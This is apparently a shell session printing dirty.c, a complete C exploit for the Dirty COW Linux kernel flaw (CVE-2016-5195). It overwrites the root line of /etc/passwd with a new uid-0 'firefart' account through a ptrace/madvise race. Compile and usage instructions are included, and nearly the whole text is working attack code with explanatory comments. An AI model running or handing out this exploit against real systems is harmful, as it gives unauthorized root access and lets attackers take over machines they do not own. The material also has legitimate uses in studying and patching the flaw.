  1. [grit@lebensraum ~]$ cat dirty.c
  2. // EDB-Note: After getting a shell, doing "echo 0 > /proc/sys/vm/dirty_writeback_centisecs" may make the system more stable.
  3. //
  4. // This exploit uses the pokemon exploit of the dirtycow vulnerability
  5. // as a base and automatically generates a new passwd line.
  6. // The user will be prompted for the new password when the binary is run.
  7. // The original /etc/passwd file is then backed up to /tmp/passwd.bak
  8. // and the root account's line is overwritten with the generated one.
  9. // After running the exploit you should be able to login with the newly
  10. // created user.
  11. //
  12. // To use this exploit modify the user values according to your needs.
  13. //   The default is "firefart".
  14. //
  15. // Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
  16. //   https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
  17. //
  18. // Compile with:
  19. //   gcc -pthread dirty.c -o dirty -lcrypt
  20. //
  21. // Then run the newly created binary by either doing:
  22. //   "./dirty" or "./dirty my-new-password"
  23. //
  24. // Afterwards, you can either "su firefart" or "ssh firefart@..." (the account has uid 0, so sshd may refuse it where PermitRootLogin is off)
  25. //
  26. // DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
  27. //   mv /tmp/passwd.bak /etc/passwd
  28. //   (the backup was created by the unprivileged user who ran the exploit, and a same-filesystem mv keeps that ownership, so follow up with: chown root:root /etc/passwd && chmod 644 /etc/passwd)
  29. // Exploit adopted by Christian "FireFart" Mehlmauer
  30. // https://firefart.at
  31. //
  32.  
#include <crypt.h>
#include <fcntl.h>
#include <pthread.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/ptrace.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
  46.  
// Target of the exploit and where copy_file() stashes the pristine copy.
// /tmp/passwd.bak is a fixed, predictable path created by the (unprivileged)
// user running the binary; copy_file() refuses to run if it already exists.
const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
// Salt handed to crypt(3) by generate_password_hash().  It does not start
// with '$', so crypt(3) treats it as a traditional DES salt (only the first
// two characters are significant).
const char *salt = "firefart";

int f;             // read-only fd on /etc/passwd, opened in main()
void *map;         // private read-only mmap of /etc/passwd plus sizeof(long) slack
pid_t pid;         // fork() result: child pid in the parent, 0 in the child
pthread_t pth;     // the madviseThread() worker started by the child
struct stat st;    // fstat() of f; only st_size is read
  56.  
// One /etc/passwd record.  generate_passwd_line() joins the fields with ':'
// in this order.  `hash` is placed directly in the password field, so it
// must be a crypt(3) string (an "x" there would defer to /etc/shadow).
struct Userinfo {
   char *username;
   char *hash;        // crypt(3) output, never the plaintext
   int user_id;       // 0 == root
   int group_id;
   char *info;        // GECOS field
   char *home_dir;
   char *shell;
};
  66.  
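/*
 * Hash `plaintext_pw` with the file-level `salt` so the result can be put
 * straight into the password field of /etc/passwd.
 *
 * Because "firefart" does not start with '$', crypt(3) selects the legacy
 * DES scheme: only the first two salt characters are used and the password
 * is truncated to eight characters, so "my-new-password" and "my-new-p"
 * hash identically and both log in.  A "$6$..." salt would select SHA-512
 * crypt where libcrypt supports it.
 *
 * Returns crypt()'s static buffer (overwritten by the next crypt() call),
 * or NULL with a message on stderr when no hash could be produced.  The
 * original returned crypt()'s result unchecked; besides NULL, newer
 * libxcrypt signals failure with a token that starts with '*', which is
 * never a valid hash.
 */
char *generate_password_hash(char *plaintext_pw) {
  char *hash = crypt(plaintext_pw, salt);
  if (hash == NULL || hash[0] == '*') {
    fprintf(stderr, "crypt() could not hash the password with salt \"%s\"\n",
      salt);
    return NULL;
  }
  return hash;
}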
  70.  
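/*
 * Render `u` as one passwd record: "name:hash:uid:gid:gecos:home:shell\n".
 *
 * Fields are joined verbatim.  Nothing here rejects a ':' or '\n' inside a
 * string field, and either would split the record, so the values set in
 * main() must stay free of separators.
 *
 * Returns a malloc'd NUL-terminated string the caller must free(), or NULL
 * if any string field is NULL, formatting fails, or malloc fails.  The
 * original passed an unchecked malloc() result to sprintf() and would have
 * requested a 1-byte buffer had snprintf() reported an error.
 */
char *generate_passwd_line(struct Userinfo u) {
  const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
  if (u.username == NULL || u.hash == NULL || u.info == NULL ||
      u.home_dir == NULL || u.shell == NULL) {
    return NULL;
  }
  // First pass only measures; -1 means the format could not be rendered.
  int size = snprintf(NULL, 0, format, u.username, u.hash,
    u.user_id, u.group_id, u.info, u.home_dir, u.shell);
  if (size < 0) {
    return NULL;
  }
  size_t len = (size_t)size + 1;   // room for the terminating NUL
  char *ret = malloc(len);
  if (ret == NULL) {
    return NULL;
  }
  snprintf(ret, len, format, u.username, u.hash, u.user_id,
    u.group_id, u.info, u.home_dir, u.shell);
  return ret;
}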
  80.  
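/*
 * Child-side half of the race: repeatedly tell the kernel to drop the
 * private copy-on-write pages of `map` so the next access re-faults from
 * the page cache while the parent's PTRACE_POKETEXT writes are in flight
 * (the Dirty COW race, CVE-2016-5195).  `arg` is unused.
 *
 * `c` accumulates madvise()'s 0/-1 results, so the printed number is minus
 * the count of failed calls.
 *
 * Returns NULL.  The original fell off the end of a non-void function,
 * which is undefined behaviour even though pthread_join() is handed NULL
 * and never reads the value.
 */
void *madviseThread(void *arg) {
  (void)arg;
  int i, c = 0;
  for(i = 0; i < 200000000; i++) {
    c += madvise(map, 100, MADV_DONTNEED);
  }
  printf("madvise %d\n\n", c);
  return NULL;
}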
  88.  
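/*
 * Copy the file at `from` to a brand-new file at `to`, keeping the source's
 * permission bits (subject to umask).
 *
 * `to` is a fixed, predictable path under /tmp, so the destination is
 * created with O_CREAT|O_EXCL: a file or symlink planted there by another
 * local user between the access() check and the open() makes the open fail
 * instead of being followed or truncated (access() is kept only for the
 * friendly message).  Preserving the mode matters because the header tells
 * the user to mv the backup back over /etc/passwd, which must stay 0644.
 *
 * Bytes are moved with read()/write() on a fixed buffer.  The original
 * compared a plain `char` against EOF, which on a signed-char platform
 * ends the copy silently at the first 0xFF byte.
 *
 * Returns 0 on success, -1 if the destination already exists, either file
 * cannot be opened, or a read/write/close fails.  A failed copy removes the
 * partial destination so the next run is not refused by the exists-check.
 */
int copy_file(const char *from, const char *to) {
  // check if target file already exists
  if(access(to, F_OK) != -1) {
    printf("File %s already exists! Please delete it and run again\n",
      to);
    return -1;
  }

  int src = open(from, O_RDONLY);
  if (src < 0) {
    return -1;
  }

  // Mirror the source's mode; fall back to 0644 if fstat() fails.
  mode_t mode = 0644;
  struct stat src_st;
  if (fstat(src, &src_st) == 0) {
    mode = src_st.st_mode & 0777;
  }

  // O_EXCL: never follow a symlink or clobber a file that appeared after
  // the access() check above.
  int dst = open(to, O_WRONLY | O_CREAT | O_EXCL, mode);
  if (dst < 0) {
    close(src);
    return -1;
  }

  int rc = 0;
  char buf[4096];
  for (;;) {
    ssize_t got = read(src, buf, sizeof buf);
    if (got == 0) {
      break;                 // EOF
    }
    if (got < 0) {
      rc = -1;
      break;
    }
    // write() may be short; loop until the whole chunk is out.
    ssize_t done = 0;
    while (done < got) {
      ssize_t put = write(dst, buf + done, (size_t)(got - done));
      if (put < 0) {
        rc = -1;
        break;
      }
      done += put;
    }
    if (rc != 0) {
      break;
    }
  }

  // close() on the written file can still report a delayed write error.
  if (close(dst) != 0) {
    rc = -1;
  }
  close(src);

  if (rc != 0) {
    unlink(to);
    return -1;
  }

  printf("%s successfully backed up to %s\n",
    from, to);
  return 0;
}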
  122.  
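/*
 * Entry point.  Backs up /etc/passwd, builds the replacement root record,
 * then races a PTRACE_POKETEXT loop (parent) against a madvise(MADV_DONTNEED)
 * loop (child) on a private read-only mapping of /etc/passwd.  On a kernel
 * vulnerable to Dirty COW (CVE-2016-5195) the pokes land in the page cache
 * and the first line of the real file is replaced.
 *
 * argv[1], if present, is the new password; otherwise it is prompted for.
 * Returns 0 once the race loops finish (success is not verified here —
 * inspect /etc/passwd), 1 on any setup failure before the race starts.
 */
int main(int argc, char *argv[])
{
  // Backup first so there is always a pristine copy to restore from.
  int ret = copy_file(filename, backup_filename);
  if (ret != 0) {
    exit(ret);
  }

  struct Userinfo user;
  // set values, change as needed
  user.username = "firefart";
  user.user_id = 0;
  user.group_id = 0;
  user.info = "pwned";
  user.home_dir = "/root";
  user.shell = "/bin/bash";

  char *plaintext_pw;

  if (argc >= 2) {
    // A password passed on the command line is visible to every local user
    // through ps / /proc/<pid>/cmdline (and is echoed here); the
    // interactive prompt below is the safer route.
    plaintext_pw = argv[1];
    printf("Please enter the new password: %s\n", plaintext_pw);
  } else {
    plaintext_pw = getpass("Please enter the new password: ");
    if (plaintext_pw == NULL) {
      fprintf(stderr, "Could not read a password from the terminal\n");
      return 1;
    }
  }

  user.hash = generate_password_hash(plaintext_pw);
  if (user.hash == NULL) {
    fprintf(stderr, "Could not hash the password\n");
    return 1;
  }
  char *complete_passwd_line = generate_passwd_line(user);
  if (complete_passwd_line == NULL) {
    fprintf(stderr, "Could not build the passwd line\n");
    return 1;
  }
  printf("Complete line:\n%s\n", complete_passwd_line);

  f = open(filename, O_RDONLY);
  if (f < 0) {
    perror(filename);
    return 1;
  }
  if (fstat(f, &st) != 0) {
    perror("fstat");
    return 1;
  }
  // sizeof(long) of slack: each poke writes a whole long, so the poke at the
  // last offset of the line reaches sizeof(long)-1 bytes past it.
  map = mmap(NULL,
             st.st_size + sizeof(long),
             PROT_READ,
             MAP_PRIVATE,
             f,
             0);
  if (map == MAP_FAILED) {
    perror("mmap");
    return 1;
  }
  printf("mmap: %lx\n",(unsigned long)map);

  // PTRACE_POKETEXT writes one long at a time, so the poke at offset l-1
  // also writes the sizeof(long)-1 bytes after the new line.  The original
  // took those bytes from past the end of the malloc'd string (heap
  // over-read) and stamped that garbage over the start of the second passwd
  // record.  Copy the line into a padded buffer whose tail holds the file's
  // own bytes at those offsets so the following record is written back as-is.
  size_t line_len = strlen(complete_passwd_line);
  char *padded = calloc(line_len + sizeof(long), 1);
  if (padded == NULL) {
    perror("calloc");
    return 1;
  }
  memcpy(padded, complete_passwd_line, line_len);
  if ((size_t)st.st_size > line_len) {
    size_t tail = (size_t)st.st_size - line_len;
    if (tail > sizeof(long)) {
      tail = sizeof(long);
    }
    memcpy(padded + line_len, (const char *)map + line_len, tail);
  }

  pid = fork();
  if (pid < 0) {
    perror("fork");
    return 1;
  }
  if(pid) {
    // Parent: wait for the child to park itself under ptrace, then hammer
    // every offset of the line with word-sized pokes.
    waitpid(pid, NULL, 0);
    int u, i, o, c = 0;
    int l = (int)line_len;
    for(i = 0; i < 10000/l; i++) {
      for(o = 0; o < l; o++) {
        // Invariant over the inner loop, so assembled once per offset; memcpy
        // avoids the misaligned long* read the original did on every poke.
        long word;
        memcpy(&word, padded + o, sizeof word);
        for(u = 0; u < 10000; u++) {
          c += ptrace(PTRACE_POKETEXT,
                      pid,
                      (char *)map + o,
                      word);
        }
      }
    }
    printf("ptrace %d\n",c);
  }
  else {
    // Child: keep discarding the private COW copy while the parent pokes,
    // and stop under ptrace so the parent's pokes target this process.
    pthread_create(&pth,
                   NULL,
                   madviseThread,
                   NULL);
    ptrace(PTRACE_TRACEME);
    kill(getpid(), SIGSTOP);
    pthread_join(pth,NULL);
  }

  free(padded);
  free(complete_passwd_line);
  munmap(map, st.st_size + sizeof(long));
  close(f);

  printf("Done! Check %s to see if the new user was created\n", filename);
  printf("You can log in with username %s and password %s.\n\n",
    user.username, plaintext_pw);
  printf("\nDON'T FORGET TO RESTORE %s FROM %s !!!\n\n",
    filename, backup_filename);
  return 0;
}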
  196. [grit@lebensraum ~]$